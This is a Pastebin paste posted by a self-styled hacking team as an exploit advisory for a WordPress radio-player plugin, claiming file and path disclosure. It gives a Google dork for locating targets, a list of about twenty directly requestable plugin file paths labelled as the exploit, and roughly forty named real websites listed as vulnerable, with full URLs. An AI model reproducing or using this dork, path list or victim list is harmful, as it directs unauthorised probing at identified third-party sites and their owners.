API tools faq
paste
KingSkrupellos

WordPress lbg-audio8-html5-radio_ads Plugins 4.9.x Info Exp

KingSkrupellos
Jan 14th, 2019
74
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.57 KB | None | 0 0
raw download clone embed print report
  1. ########################################################################################
  2.  
  3. # Exploit Title : WordPress lbg-audio8-html5-radio_ads Plugins 4.9.x File Information Exposure
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 14/01/2019
  7. # Vendor Homepage : lambertgroupproductions.com
  8. # Software Download Link :
  9. codecanyon.net/item/shout-html5-radio-player-with-ads-shoutcast-and-icecast-support-wordpress-plugin/20667135
  10. # Software Price : 21$
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Affected Versions : From 3.0 To 4.9.x
  14. # Exploit Risk : High
  15. # Google Dorks : inurl:"/wp-content/plugins/lbg-audio8-html5-radio_ads/"
  16. # Vulnerability Type : CWE-200 [ Information Exposure ]
  17. CWE-538 [ File and Directory Information Exposure ]
  18. CWE-22 [ Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ]
  19.  
  20. ########################################################################################
  21.  
  22. WordPress Plugin - SHOUT - HTML5 Radio Player With Ads - ShoutCast and IceCast Support
  23.  
  24. ########################################################################################
  25.  
  26. # Impact :
  27. ***********
  28.  
  29. * WordPress lbg-audio8-html5-radio_ads 4.9.x and other versions is prone to an arbitrary file disclosure
  30.  
  31. vulnerability because it fails to properly sanitize user-supplied input.
  32.  
  33. * An attacker can exploit this vulnerability to view local files in the context of the web server process,
  34.  
  35. which may aid in launching further attacks.
  36.  
  37. * An information exposure is the intentional or unintentional disclosure
  38.  
  39. of information to an actor that is not explicitly authorized to have access to that information.
  40.  
  41. * The product stores sensitive information in files or directories that are accessible
  42.  
  43. to actors outside of the intended control sphere.
  44.  
  45. * The software uses external input to construct a pathname that is intended to identify a file or
  46.  
  47. directory that is located underneath a restricted parent directory, but the software does not
  48.  
  49. properly neutralize special elements within the pathname that can cause the pathname
  50.  
  51. to resolve to a location that is outside of the restricted directory.
  52.  
  53. ########################################################################################
  54.  
  55. # Exploit :
  56. *************
  57.  
  58. /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_banner.php
  59.  
  60. /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_banner.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Banners
  61.  
  62. /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  63.  
  64. /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Categories
  65.  
  66. /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_player.php
  67.  
  68. /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_player.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Players
  69.  
  70. /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_playlist_record.php
  71.  
  72. /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_playlist_record.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Playlist
  73.  
  74. /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/banners.php
  75.  
  76. /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/categories.php
  77.  
  78. /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/help.php
  79.  
  80. /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php
  81.  
  82. /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Players
  83.  
  84. /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Add_New
  85.  
  86. /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Categories
  87.  
  88. /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Manage_Banners
  89.  
  90. /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/overview.php?page=LBG_AUDIO8_HTML5_SHOUTCAST_Help
  91.  
  92. /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/players.php
  93.  
  94. /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/playlist.php
  95.  
  96. /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/preview.html
  97.  
  98. /wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/settings_form.php
  99.  
  100. ########################################################################################
  101.  
  102. Video Tutorials =>
  103. *******************
  104.  
  105. Installation - youtube.com/watch?v=km5cVH-iH_8
  106. How To Use The Player - youtube.com/watch?v=DVLHNopEpXw
  107. Manage The Banners - youtube.com/watch?v=i4CWseyJmLc
  108.  
  109. ########################################################################################
  110.  
  111. # Example Vulnerable Sites :
  112. *************************
  113.  
  114. [+] radioekklesia.com/radio/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  115.  
  116. [+] novorio87fm.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  117.  
  118. [+] skatemetalold.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  119.  
  120. [+] j-air.com.au/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  121.  
  122. [+] mediality.fr/glitter/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  123.  
  124. [+] radiouppermurray.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  125.  
  126. [+] soberforliferadio.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  127.  
  128. [+] radiostudion.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  129.  
  130. [+] radiosuper.mobi/wp/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  131.  
  132. [+] pamehellas.gr/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  133.  
  134. [+] sociedadenewsfm.com.br/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  135.  
  136. [+] radiopeniel.net/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  137.  
  138. [+] osmiumawards.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  139.  
  140. [+] radiomorabeza.cv/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  141.  
  142. [+] wwcufm.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  143.  
  144. [+] radiopolis.gr/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  145.  
  146. [+] radiost.com.br/wp/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  147.  
  148. [+] patrola021.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  149.  
  150. [+] soleilfmbenin.com/sfm/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  151.  
  152. [+] lawtudent.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  153.  
  154. [+] imprensamadureira.com.br/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  155.  
  156. [+] streaminginternacional.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  157.  
  158. [+] bandeando.fm/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  159.  
  160. [+] mantenanews.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  161.  
  162. [+] radio-varazdin.hr/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  163.  
  164. [+] hostpa.com.br/siteum/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  165.  
  166. [+] radiocapital.cat/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  167.  
  168. [+] xn--aydnrehberi-1zb.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  169.  
  170. [+] gokiebox.pe/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  171.  
  172. [+] radiotown.fi/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  173.  
  174. [+] tendenciafm.cl/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  175.  
  176. [+] radio7.co.tz/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  177.  
  178. [+] radios.bolivia.bo/backup/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  179.  
  180. [+] goldenflash.be/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  181.  
  182. [+] nordestefmbrasilia.com.br/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  183.  
  184. [+] ucradio.net/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  185.  
  186. [+] ellinikos.live/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  187.  
  188. [+] princesafm.com.br/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  189.  
  190. [+] djgrga-radio.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  191.  
  192. [+] nococommunityradio.org/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  193.  
  194. [+] diocesedecaxiasdomaranhao.org/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  195.  
  196. [+] umakiwefm.com/wp-content/plugins/lbg-audio8-html5-radio_ads/tpl/add_category.php
  197.  
  198. ########################################################################################
  199.  
  200. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  201.  
  202. ########################################################################################
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!